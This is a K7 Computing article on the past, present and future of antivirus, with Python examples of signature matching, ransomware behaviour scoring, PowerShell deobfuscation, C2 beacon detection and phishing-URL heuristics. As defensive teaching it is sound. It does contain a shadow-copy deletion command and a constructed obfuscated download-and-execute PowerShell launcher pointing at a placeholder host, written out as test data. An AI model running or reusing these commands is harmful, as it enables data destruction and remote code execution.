Computers have needed antivirus ever since computers began entering the mainstream. Viruses were created as soon as computers grew beyond specialised use and could be used for meaningful activity by a larger section of the public. Some viruses were just pranks, but the viruses we are familiar with are a lot more serious and can be severely destructive. Worryingly, the destructive impact of viruses is growing as we live in an increasingly interconnected and digitally-enabled world.

What will we need in antivirus to counter the cyberattacks of tomorrow? Let us first examine where antivirus has been to understand where it must go.

Antivirus of the Past

The term ‘virus’ was coined to describe simple cyberthreats that spread like a biological virus, e.g. the virus would arrive at a PC on a floppy disk and copy itself to any floppy disk that was used on that computer, spreading to other PCs when those floppy disks were used on them. The term ‘antivirus’ was coined to describe programs that defended against such cyberthreats.

Signature-based Protection

The antivirus of the past seems very simple compared to the antivirus we have today and will have tomorrow. Antivirus developers would analyse a virus in a lab and develop a signature, typically a hash of the file or a distinctive sequence of bytes taken from it, to identify the virus. A group of such signatures would form a definition update that was distributed on floppy disks or CDs/DVDs and later through the internet. As the number of viruses increased, having an individual signature for each virus made the definition updates impractically large. Generic definitions were developed that could identify a whole family of similar viruses from the code its members share rather than from an exact match. The antivirus program would scan every file on the PC’s disk and check it against the definitions to identify viruses.
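To make the difference between an exact signature and a generic family signature concrete, here is a small Python illustration added to this article (it is not K7’s engine; the ‘virus’ bodies are harmless byte strings constructed here and the signature names are invented). A hash signature catches only the sample that was analysed in the lab, while a generic pattern with a wildcard over the part that changes between generations catches every member of the family with a single definition entry:

```python
"""Hash signatures versus a generic family signature.

Added illustration, not K7's engine: the 'malware' bodies are harmless byte
strings constructed here, and the signature names are invented."""
import hashlib
import re
from typing import Dict, Optional


def make_family_member(generation: int) -> bytes:
    """Constructed stand-in for one member of a floppy-spreading virus family.

    Every member carries the same replication routine; only a two-byte
    generation counter differs, which is enough to change the file hash."""
    return (b"MZ\x90\x00" + b"\x00" * 4
            + b"COPY_SELF_TO:A:\\" + generation.to_bytes(2, "big")
            + b"\x00HOOK_INT13\x00")


KNOWN_SAMPLE = make_family_member(1)  # the one sample analysed in the lab
BENIGN = b"MZ\x90\x00" + b"\x00" * 4 + b"Hello, world\x00"

# Exact signature: one SHA-256 per analysed sample. Precise, but every new
# generation needs a new entry, which is why definition files grew so large.
HASH_SIGNATURES: Dict[str, str] = {
    hashlib.sha256(KNOWN_SAMPLE).hexdigest(): "Floppy.Worm.gen1",
}

# Generic signature: the replication routine with a wildcard over the
# counter, so one entry covers the whole family. re.DOTALL lets '.' match
# any byte value, including 0x0A.
GENERIC_SIGNATURES = {
    "Floppy.Worm": re.compile(rb"COPY_SELF_TO:[A-Z]:\\.{2}\x00HOOK_INT13", re.DOTALL),
}


def match_hash(data: bytes) -> Optional[str]:
    return HASH_SIGNATURES.get(hashlib.sha256(data).hexdigest())


def match_generic(data: bytes) -> Optional[str]:
    for name, pattern in GENERIC_SIGNATURES.items():
        if pattern.search(data):
            return name
    return None


def scan(data: bytes) -> Dict[str, Optional[str]]:
    """Run both signature types over one file body."""
    return {"hash": match_hash(data), "generic": match_generic(data)}


if __name__ == "__main__":
    for label, body in (("known", KNOWN_SAMPLE),
                        ("variant", make_family_member(2)),
                        ("benign", BENIGN)):
        print(f"{label:8s} {scan(body)}")
```

The variant is the same virus one generation later: its hash is unknown to the definitions, yet the generic pattern still identifies the family. The flip side, which the article goes on to describe, is that a generic pattern can be defeated by an attacker who rewrites or obfuscates the shared routine itself.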

Limitations of Antivirus of the Past

Cyberthreats soon evolved beyond simple viruses. Computing users face a wide array of cyberattacks including worms, Trojans and ransomware, collectively known as malware, as well as zero-day attacks that exploit flaws for which no fix or signature yet exists. Web threats are widely encountered, including drive-by downloads and phishing websites that mimic legitimate websites. Email and text messaging platforms are used to deliver malicious attachments and links. Malicious apps are found even on official app stores for mobile devices. Hackers develop obfuscation techniques to hide their malware from signature-based scanning. The number of cyberthreats has also increased significantly, with over 450,000 new threats registered every day.

The antivirus of the past, with simple file scanning and signature-based protection, is unable to handle the variety and volume of modern cyberthreats. While file scanning and signatures are still necessary, they are no longer sufficient to protect computing users. The name ‘antivirus’ still remains, but digital protection systems have to be capable of a lot more than just looking for viruses.

Modern Capabilities of Antivirus

Real-time Protection

Modern antivirus cannot rely on running a virus scan once a day, and has to be capable of scanning for threats in real time. When a user opens an email attachment, the file has to be scanned before it opens. When a file is downloaded from the internet, it must be scanned before it can run. This is real-time protection.

This does not mean scheduled scans are no longer required. Malware can be designed to stay dormant and exhibit no malicious behaviour until a specific date or event occurs. Deep scanning at scheduled intervals is still necessary to spot such dormant malware.

Deobfuscation

Obfuscation is a technique used by threat actors to disguise malware and evade detection by antivirus programs: the malicious code is packed, encrypted or encoded, and is only unpacked when the program runs, so the bytes on disk no longer resemble anything in the definitions. Antivirus must be capable of deconstructing files and have deobfuscation/decloaking capabilities, whether by statically unpacking and decoding the layers or by emulating the file and inspecting what it produces, to identify if, and how, the files are malicious.

Behaviour-based Protection

While signature-based protection continues to be effective at stopping malware, it depends on the malware being identified, analysed in a lab, having a signature generated, and the signature being received by the user before it can be effective. The first netizens to encounter a type of malware will, therefore, not be protected as no signature will have been generated yet. Such unknown attacks are known as zero-day attacks. Due to the very large number of malware created every day, the probability of encountering malware before a signature is available keeps increasing. Behaviour-based protection, which does not rely on signatures and instead analyses the behaviour of a file or process to identify malicious activity, protects users against such unknown threats.

Well-designed behaviour-based protection can be very effective. In a unique test, a cybersecurity analyst turned off K7’s signature-based detection and used only K7’s behaviour-based detection to test its effectiveness against ransomware samples, effectively turning all the samples into zero-day ransomware. K7’s antivirus successfully defended against all the ransomware samples and received a perfect score in the test, demonstrating the power of behaviour-based protection.
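As an added illustration (this is not K7’s behaviour engine; the event format, the point values and thresholds, and the sample events are all constructed for this example), the following Python scores processes on what they do rather than on what their file looks like: many high-entropy writes to user documents in a short window, renaming files to an unknown extension, and deleting Volume Shadow Copies. No signature is involved, so the sample ‘ransomware’ is blocked on its first appearance. The example also includes an archiver that writes high-entropy data to only a couple of files, to show why a single indicator is scored rather than blocked outright:

```python
"""Behaviour-based detection of ransomware-like activity from an event stream.

Added illustration, not K7's engine: the event format, the point values and
thresholds, and the sample events are all constructed for this example."""
import math
from collections import defaultdict, deque
from typing import Deque, Dict, List, Tuple

HIGH_ENTROPY_BITS = 7.0   # bits per byte; ciphertext and compressed data approach 8.0
WINDOW_SECONDS = 10.0     # sliding window for the mass-write rule
MASS_WRITE_FILES = 5      # distinct high-entropy files written inside one window
BLOCK_SCORE = 4
DOC_EXTENSIONS = {"docx", "xlsx", "pptx", "pdf", "jpg", "png", "txt", "zip"}


def shannon_entropy(data: bytes) -> float:
    """Bits of entropy per byte: 0.0 for empty or constant input, 8.0 for uniform."""
    if not data:
        return 0.0
    counts = [0] * 256
    for b in data:
        counts[b] += 1
    n = len(data)
    return -sum(c / n * math.log2(c / n) for c in counts if c)


def extension(path: str) -> str:
    return path.rsplit(".", 1)[-1].lower() if "." in path else ""


class BehaviourMonitor:
    """Scores each process on what it does, not on what its file looks like."""

    def __init__(self) -> None:
        self.recent_writes: Dict[int, Deque[Tuple[float, str]]] = defaultdict(deque)
        self.score: Dict[int, int] = defaultdict(int)
        self.reasons: Dict[int, List[str]] = defaultdict(list)

    def _hit(self, pid: int, points: int, reason: str) -> None:
        if reason not in self.reasons[pid]:      # each indicator counts once per process
            self.score[pid] += points
            self.reasons[pid].append(reason)

    def observe(self, ev: dict) -> str:
        pid, op = ev["pid"], ev["op"]
        if op == "write" and shannon_entropy(ev["data"]) >= HIGH_ENTROPY_BITS:
            window = self.recent_writes[pid]
            window.append((ev["t"], ev["path"]))
            while window and ev["t"] - window[0][0] > WINDOW_SECONDS:
                window.popleft()
            if len({path for _, path in window}) >= MASS_WRITE_FILES:
                self._hit(pid, 3, "mass high-entropy writes to user files")
        elif op == "rename" and extension(ev["new_path"]) not in DOC_EXTENSIONS:
            self._hit(pid, 1, "rename to unknown extension")
        elif op == "exec":
            cmd = ev["cmd"].lower()
            if "vssadmin" in cmd and "delete shadows" in cmd:
                self._hit(pid, 4, "shadow copy deletion")
        return self.verdict(pid)

    def verdict(self, pid: int) -> str:
        return "block" if self.score[pid] >= BLOCK_SCORE else "allow"


# Constructed sample stream, not real telemetry. CIPHERTEXT stands in for
# encrypted output (every byte value twice, so its entropy is exactly 8.0).
CIPHERTEXT = bytes(range(256)) * 2
PLAINTEXT = b"Quarterly report: revenue grew 4% on the back of new product lines. " * 8


def sample_events() -> List[dict]:
    docs = [f"C:/Users/a/Documents/doc{i}.docx" for i in range(6)]
    events = [{"t": float(i), "pid": 4242, "op": "write", "path": p, "data": CIPHERTEXT}
              for i, p in enumerate(docs)]                        # suspected ransomware
    events += [{"t": 6.0 + i * 0.1, "pid": 4242, "op": "rename", "path": p,
                "new_path": p + ".locked"} for i, p in enumerate(docs)]
    events.append({"t": 7.0, "pid": 4242, "op": "exec",
                   "cmd": "vssadmin.exe delete shadows /all /quiet"})
    events.append({"t": 1.0, "pid": 3100, "op": "write",                 # word processor
                   "path": "C:/Users/a/Documents/notes.txt", "data": PLAINTEXT})
    events += [{"t": 2.0 + i, "pid": 3500, "op": "write",                # archiver: high
                "path": f"C:/Backups/part{i}.zip", "data": CIPHERTEXT}    # entropy, few files
               for i in range(2)]
    return events


def run(events: List[dict]) -> Dict[int, Tuple[str, List[str]]]:
    monitor = BehaviourMonitor()
    for ev in sorted(events, key=lambda e: e["t"]):
        monitor.observe(ev)
    return {pid: (monitor.verdict(pid), monitor.reasons[pid]) for pid in list(monitor.score)}


if __name__ == "__main__":
    for pid, (verdict, why) in run(sample_events()).items():
        print(pid, verdict, why)
```

In practice the scoring is the hard part: compression tools and encrypted backups produce high-entropy output too, which is why the mass-write rule needs several distinct files in a short window and why a block decision is made on the accumulated score rather than on any one event.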

File-less Malware Protection

Malware has traditionally existed as files, but file-less malware has emerged. This form of malware uses malicious scripts that run inside legitimate applications and processes, so the malware exists mainly in memory, leaving little or nothing on the device’s disk for conventional file scanning to examine (often only a small launcher in a registry key or scheduled task that re-creates the script at start-up). Antivirus like K7’s antivirus supports the Windows Antimalware Scan Interface (AMSI), which script hosts such as PowerShell and Windows Script Host call with the content they are about to run, so that dynamic scripts are scanned after the host has decoded them and before they execute.
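The following Python, added here to illustrate both the deobfuscation point and the AMSI point above (it is not K7’s engine nor the real AMSI API, and the launcher, the URL and the signature name are constructed), peels three common layers, a base64-encoded command line, string concatenation and a base64 string literal, and then matches a signature against the result. Scanning the command line as it sits on disk finds nothing; scanning what the script host is about to execute, which is what an AMSI provider is handed, does:

```python
"""Layered deobfuscation, then signature matching on what will actually run.

Added illustration, not K7's engine and not the real Windows AMSI API. The
launcher is constructed here (example.invalid never resolves) and the
signature name is invented."""
import base64
import re
from typing import Callable, List, Optional, Tuple

# Applied to *decoded* content. Either indicator alone is common in admin
# scripts; download-then-evaluate is the combination worth flagging.
SIGNATURES = {"Downloader.PS": re.compile(
    r"(?=.*(?:invoke-expression|\biex\b))(?=.*downloadstring)", re.I | re.S)}

ENC_FLAG = re.compile(r"-(?:e|ec|enc|encodedcommand)\s+([A-Za-z0-9+/=]+)", re.I)
CONCAT = re.compile(r"""\(\s*(['"][^'"]*['"](?:\s*\+\s*['"][^'"]*['"])+)\s*\)""")
B64_CALL = re.compile(r"""FromBase64String\(\s*['"]([A-Za-z0-9+/=]+)['"]\s*\)""", re.I)


def layer_encoded_command(text: str) -> Optional[str]:
    """powershell -enc <base64 of a UTF-16LE script>  ->  the script itself."""
    m = ENC_FLAG.search(text)
    if not m:
        return None
    try:
        return base64.b64decode(m.group(1)).decode("utf-16-le")
    except (ValueError, UnicodeDecodeError):
        return None


def layer_concat(text: str) -> Optional[str]:
    """('Inv'+'oke-Expr'+'ession')  ->  'Invoke-Expression'."""
    def join(m):
        return "'" + "".join(re.findall(r"""['"]([^'"]*)['"]""", m.group(1))) + "'"
    out = CONCAT.sub(join, text)
    return out if out != text else None


def layer_b64_literal(text: str) -> Optional[str]:
    """[Convert]::FromBase64String('...')  ->  the decoded string literal."""
    def decode(m):
        try:
            return "'" + base64.b64decode(m.group(1)).decode("utf-8") + "'"
        except (ValueError, UnicodeDecodeError):
            return m.group(0)
    out = B64_CALL.sub(decode, text)
    return out if out != text else None


LAYERS: List[Callable[[str], Optional[str]]] = [
    layer_encoded_command, layer_concat, layer_b64_literal]


def deobfuscate(text: str, max_rounds: int = 8) -> Tuple[str, List[str]]:
    """Peel layers until nothing changes. The round limit bounds the work an
    attacker can force by nesting encodings. Returns the content and the trail."""
    trail: List[str] = []
    for _ in range(max_rounds):
        for layer in LAYERS:
            out = layer(text)
            if out is not None:
                trail.append(layer.__name__)
                text = out
                break
        else:
            break
    return text, trail


def scan_content(text: str) -> Optional[str]:
    for name, pattern in SIGNATURES.items():
        if pattern.search(text):
            return name
    return None


def scan_script_launch(cmdline: str) -> dict:
    """'static' is what a file or command-line scanner sees; 'runtime' is what
    an AMSI provider is handed once the script host has decoded what it is
    about to execute."""
    decoded, trail = deobfuscate(cmdline)
    return {"static": scan_content(cmdline), "runtime": scan_content(decoded), "layers": trail}


def build_sample() -> str:
    """Constructed launcher in the style of a fileless downloader (harmless)."""
    url_b64 = base64.b64encode(b"http://example.invalid/p.ps1").decode()
    inner = ("& ('Inv'+'oke-Expr'+'ession') ((New-Object Net.WebClient)."
             "('Down'+'loadStr'+'ing')([Text.Encoding]::UTF8.GetString("
             f"[Convert]::FromBase64String('{url_b64}'))))")
    enc = base64.b64encode(inner.encode("utf-16-le")).decode()
    return f"powershell.exe -nop -w hidden -enc {enc}"


if __name__ == "__main__":
    print(scan_script_launch(build_sample()))
```

Two design points carry over to real engines: the layers are applied repeatedly because attackers nest them, and the loop is bounded so that a sample cannot turn the scanner into a denial-of-service target by nesting thousands of encodings.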

Firewall

Most, if not all, computers can be expected to connect to the internet in our interconnected world and may additionally connect to other computing devices through a local network. Data traffic flowing into and out of the computer may indicate threat activity, e.g. a seemingly harmless program may connect to a Command & Control (C2) server operated by a threat actor that will send instructions or even malicious scripts to be executed. Antivirus programs like K7 Ultimate Security include a firewall that inspects the data flowing into and out of the computer to identify and block potential network-based threats.
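One network-level pattern a firewall can look for is C2 beaconing: an implant checks in with its server at a near-fixed interval. The Python below, added here as an illustration (it is not K7’s firewall; the log lines are constructed and use the 203.0.113.0/24 and 198.51.100.0/24 documentation address ranges, and the thresholds are starting points rather than tuned values), groups outbound connections by process and destination and flags flows whose gaps are regular, while a browser’s bursty traffic to the same port is left alone:

```python
"""Spotting command-and-control beaconing in outbound connection records.

Added illustration, not K7's firewall. The log lines are constructed
(203.0.113.0/24 and 198.51.100.0/24 are documentation ranges) and the
thresholds are starting points, not tuned values."""
import statistics
from collections import defaultdict
from datetime import datetime
from typing import Dict, List, Tuple

MIN_CONNECTIONS = 6      # fewer than this and the interval statistics mean little
MAX_JITTER = 0.25        # stdev/mean of inter-connection gaps; beacons are regular
MIN_PERIOD_S, MAX_PERIOD_S = 10.0, 3600.0

# Constructed outbound-connection log: time, process, destination, bytes out/in.
LOG = """\
2023-06-01T10:00:00 svchost_helper.exe 203.0.113.7:443 out=512 in=128
2023-06-01T10:00:05 chrome.exe 198.51.100.20:443 out=1840 in=52311
2023-06-01T10:00:07 chrome.exe 198.51.100.20:443 out=960 in=10244
2023-06-01T10:00:08 chrome.exe 198.51.100.20:443 out=2100 in=88012
2023-06-01T10:01:02 svchost_helper.exe 203.0.113.7:443 out=514 in=130
2023-06-01T10:02:01 svchost_helper.exe 203.0.113.7:443 out=512 in=128
2023-06-01T10:02:30 chrome.exe 198.51.100.20:443 out=1310 in=23400
2023-06-01T10:02:31 chrome.exe 198.51.100.20:443 out=700 in=1200
2023-06-01T10:03:03 svchost_helper.exe 203.0.113.7:443 out=516 in=4096
2023-06-01T10:04:00 svchost_helper.exe 203.0.113.7:443 out=512 in=128
2023-06-01T10:05:02 svchost_helper.exe 203.0.113.7:443 out=512 in=128
2023-06-01T10:06:01 svchost_helper.exe 203.0.113.7:443 out=513 in=129
2023-06-01T10:09:00 chrome.exe 198.51.100.20:443 out=1500 in=64000
"""

Record = Tuple[datetime, str, str, int, int]


def parse(log: str) -> List[Record]:
    """One record per line: (timestamp, process, destination, bytes_out, bytes_in)."""
    records = []
    for line in log.splitlines():
        ts, proc, dst, out_kv, in_kv = line.split()
        records.append((datetime.fromisoformat(ts), proc, dst,
                        int(out_kv.split("=")[1]), int(in_kv.split("=")[1])))
    return records


def find_beacons(records: List[Record]) -> List[dict]:
    """Group by (process, destination) and flag flows whose gaps are regular."""
    flows: Dict[Tuple[str, str], List[datetime]] = defaultdict(list)
    for ts, proc, dst, _, _ in records:
        flows[(proc, dst)].append(ts)
    alerts = []
    for (proc, dst), times in flows.items():
        if len(times) < MIN_CONNECTIONS:
            continue
        times.sort()
        gaps = [(b - a).total_seconds() for a, b in zip(times, times[1:])]
        mean = statistics.mean(gaps)
        if not MIN_PERIOD_S <= mean <= MAX_PERIOD_S:
            continue
        jitter = statistics.pstdev(gaps) / mean   # coefficient of variation
        if jitter <= MAX_JITTER:
            alerts.append({"process": proc, "destination": dst,
                           "connections": len(times),
                           "period_s": round(mean, 1), "jitter": round(jitter, 3)})
    return alerts


if __name__ == "__main__":
    for alert in find_beacons(parse(LOG)):
        print(alert)
```

Legitimate software polls too: update checkers and mail clients produce the same regular cadence, so a hit is a prompt to look at the process and, if it is expected, to allow-list that flow, not a conviction on its own. Implants that randomise their sleep interval push the jitter up, which is why the ratio threshold is deliberately loose and why the byte counts in the log (near-identical check-in sizes) are worth a second rule.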

Web Protection

Modern day life revolves around accessing various websites and therefore websites have become a source of cyberthreats. Computing users may be sent links to malicious websites; hackers may create phishing websites that mimic legitimate websites (such as banking websites) to mislead users into providing their credentials; and genuine websites may be compromised to launch drive-by downloads, where a malicious file is downloaded to the user’s device without the user clicking on a download link or otherwise interacting with the webpage in any way.

K7’s antivirus includes phishing protection to block phishing websites and also block links in emails and other text-based media that direct users to phishing websites. Drive-by download blocking ensures that malicious files do not automatically download from websites.
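A few of the checks a phishing-link blocker can apply locally, before any cloud lookup, can be shown in code. The Python below is an added illustration (not K7’s web protection); the brand table is constructed, with ‘example’ owning example.com and example.org, and the lookalike hosts use reserved .invalid names and the 203.0.113.0/24 documentation range. It goes slightly beyond the mimicking described above: besides the brand’s name appearing in a domain the brand does not own, it handles digit and accent homoglyphs including punycode hosts, the userinfo-before-‘@’ trick and raw IP hosts, and it lets the genuine domain and an unrelated site that merely mentions the brand through:

```python
"""Heuristics for spotting a phishing URL that impersonates a known brand.

Added illustration, not K7's web protection. BRANDS is a constructed table:
'example' owns example.com and example.org; lookalike hosts use reserved
.invalid names and the 203.0.113.0/24 documentation range."""
import ipaddress
import unicodedata
from typing import Dict, Set
from urllib.parse import urlparse

BRANDS: Dict[str, Set[str]] = {"example": {"example.com", "example.org"}}
SECOND_LEVEL = {"co", "com", "org", "net", "ac", "gov"}   # for names like foo.co.uk
KEYWORDS = ("login", "verify", "secure", "update", "account")
HOMOGLYPHS = str.maketrans({"0": "o", "1": "l", "3": "e", "5": "s", "|": "l"})
PUNYCODE_URL = "https://" + "ex\u00e4mple.invalid".encode("idna").decode("ascii") + "/"


def registered_domain(host: str) -> str:
    """Naive public-suffix handling: last two labels, or three for foo.co.uk."""
    labels = host.lower().strip(".").split(".")
    if len(labels) >= 3 and labels[-2] in SECOND_LEVEL and len(labels[-1]) == 2:
        return ".".join(labels[-3:])
    return ".".join(labels[-2:])


def fold(host: str) -> str:
    """Undo the tricks that make a hostname merely *look* like the brand:
    decode punycode, strip accents, map digit and two-letter homoglyphs."""
    labels = []
    for label in host.lower().split("."):
        if label.startswith("xn--"):
            try:
                label = label.encode("ascii").decode("idna")
            except UnicodeError:
                pass
        nfkd = unicodedata.normalize("NFKD", label)
        labels.append("".join(c for c in nfkd if not unicodedata.combining(c)))
    return ".".join(labels).translate(HOMOGLYPHS).replace("rn", "m").replace("vv", "w")


def classify(url: str) -> dict:
    parsed = urlparse(url)
    host = parsed.hostname or ""
    score, reasons = 0, []

    def hit(points: int, reason: str) -> None:
        nonlocal score
        score += points
        reasons.append(reason)

    for brand, real_domains in BRANDS.items():
        if registered_domain(host) in real_domains:
            return {"url": url, "verdict": "allow",
                    "reasons": [f"registered domain belongs to '{brand}'"]}
    try:
        ipaddress.ip_address(host)
        hit(2, "raw IP address instead of a hostname")
    except ValueError:
        pass
    if "@" in parsed.netloc:
        hit(2, "userinfo before '@' hides the real host")
    for brand in BRANDS:
        if brand in parsed.netloc.lower():
            hit(3, f"'{brand}' appears in a domain the brand does not own")
        elif brand in fold(host):
            hit(3, f"hostname is a homoglyph or IDN lookalike of '{brand}'")
    if score and any(k in (parsed.path + "?" + parsed.query).lower() for k in KEYWORDS):
        hit(1, "credential-harvesting keyword in the path")
    verdict = "block" if score >= 3 else "warn" if score else "allow"
    return {"url": url, "verdict": verdict, "reasons": reasons}


SAMPLE_URLS = [
    "https://www.example.com/login",                             # genuine
    "https://example.com.verify-account.invalid/login",          # brand in subdomain
    "https://examp1e.invalid/secure",                            # digit homoglyph
    "http://203.0.113.9/example/login",                          # bare IP host
    "https://www.example.com@verify-account.invalid/login",      # '@' trick
    PUNYCODE_URL,                                                # IDN homograph
    "https://news.invalid/article-about-example",                # unrelated site
]

if __name__ == "__main__":
    for url in SAMPLE_URLS:
        result = classify(url)
        print(f"{result['verdict']:5s} {url}  {result['reasons']}")
```

Heuristics like these catch the crude impersonations at zero cost and without a network round trip; they say nothing about a phishing page hosted on a freshly registered domain that does not mention the brand at all, which is where the cloud-based verification described in the next section takes over.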

Cloud-based Protection

Given that there are over 1.2 billion websites in the world and 252,000 new websites are created every day, how can antivirus software identify malicious websites, especially when malicious websites even appear in search engine result pages? K7’s antivirus includes Safe Surf and Safe Search features which use cloud-based website verification to highlight unsafe websites and keep netizens safe from dangerous internet destinations.

Webcam Protection

Hackers need not make their attacks obvious by destroying data or displaying threatening messages. A cyberattack may be unobtrusive, e.g. spying on you through your webcam. Antivirus software like K7 Total Security allows you to control, or even block, webcam access to prevent webcam spying.

Mobile Device Protection

Antivirus is not just for desktops and laptops. Mobile phones and tablets are increasingly used to satisfy the computing needs of netizens and are even the only computing device for many users. Mobile devices are also targeted by hackers and suffer many cyberattacks, including phishing and the availability of malicious apps even on official app stores. Mobile devices are a particularly attractive target for hackers as OTPs are often received on mobile devices and malware can be used to steal OTPs and compromise user accounts or transfer funds from bank accounts. Antivirus solutions such as K7 Mobile Security for Android and iOS keep users safe from these threats.

The Future of Antivirus

Cyberattacks are not going to stop. They are going to increase in frequency and impact and, therefore, antivirus also has to evolve to keep users safe. Artificial Intelligence/Machine Learning (AI/ML) and the cloud will be leveraged by antivirus developers to protect users. We have already discussed how the cloud is used in antivirus and K7 is already using AI/ML to improve protection.

Artificial Intelligence

Antivirus developers can use AI/ML in 3 ways:

Threat Hunting

As digital interaction increases, the volume of potential threat signals increases. AI can be used by antivirus developers to analyse the data and rapidly identify patterns to spot emerging attacks.

Enhanced Behavioural Protection

We have already discussed the importance of behaviour-based protection. AI can strengthen behaviour analysis to spot anomalous behaviour across a wide variety of contexts and flag potential malicious activity.

Website Analysis

The content and other authenticity indicators of websites can be used to identify malicious websites and classify genuine websites for category-based blocking e.g., to protect children from inappropriate content.

Protection from AI

While antivirus can protect using AI, antivirus can also protect users against malicious uses of AI. Phishing messages that are crafted using AI may appear genuine and convincing, but phishing link blocking in antivirus will keep users safe. Agentic AI may be compromised by threat actors so that AI agents perform malicious actions on the user’s behalf, but antivirus will identify and stop the suspicious downloads and processes that result.

K7 is an early adopter of AI to enhance the threat stopping power of K7’s antivirus.

Cloud

The cloud will be used to shorten the time taken to distribute updates to the antivirus installed on each user’s device. Users’ devices will connect to a cloud server near them to receive the update quickly rather than having to queue to receive updates from a few congested servers.

Cloud technology will also allow users to back up their data to the cloud, improving resilience not just against cyberattacks but also against hardware events such as disk failure. Cloud data backup services are already available, and the speed and size of such backups will improve as cloud storage and transfer become cheaper.

Users may already be familiar with digital sandboxes that allow them to open files and run applications, that are suspected of being malicious, in an isolated environment without risking the rest of their digital infrastructure. Sandboxes hosted in the cloud will make it easier for users to access such technology, collaborate with security experts through the cloud to analyse the samples, and reduce the risk of viruses spreading through their home or business network.

The cloud will also be increasingly used to control cybersecurity especially in enterprise environments. K7’s enterprise solutions already use consoles hosted in the cloud to manage cybersecurity for businesses, without being constrained by time or place.

Antivirus has always been an arms race between cyberattackers and cyber defenders. Hackers will harness technologies such as AI and the cloud to augment their attacks and antivirus developers will harness these, and other, technologies to prevent attacks. Defenders must be determined and resolute in their efforts to ensure the digital realm remains a safe space, and guard against complacency.

Computing users from around the world who wish to remain safe in cyberspace rely on K7’s multi-award-winning technology to protect themselves on their preferred platforms against the cyberthreats of today and tomorrow.

FAQs

1. Why is yesterday’s antivirus unable to protect today’s users?

Cyberthreats of yesterday were relatively simple and so were the antivirus solutions. Such antivirus, that depended on signature-based protection, will not be able to protect users against modern threats including threats that are specifically designed to evade signature-based detection. The current threat landscape includes zero-day attacks, phishing, and attacks on mobile devices. The antivirus of today, and tomorrow, must be capable of protecting the entire digital lifestyle of the user.

2. How will the antivirus of tomorrow differ from the antivirus of today?

Just like the antivirus of today builds on antivirus of the past and even includes signature-based protection, so also will the antivirus of tomorrow add to the antivirus of today by increasing the speed of detection and distribution of updates, and use technologies like AI to analyse behaviour and identify and stop even completely unknown threats. The ability to spot patterns and identify potential threats before they turn into emergent threats will be particularly important in stopping tomorrow’s cyberattacks.

3. How does K7 stop the viruses of today and tomorrow?

K7’s antivirus already uses AI and cloud-based protection to stop viruses and other cyberattacks. Our antivirus is also backed by K7 Labs’ analysis of hundreds of thousands of threat samples every day that enables us to distribute multiple updates every day, understand and anticipate the evolution of cyberthreats, and continuously refine our products to ensure peace of mind for our users against present and future cyberattacks.


2023 K7 Computing. All Rights Reserved.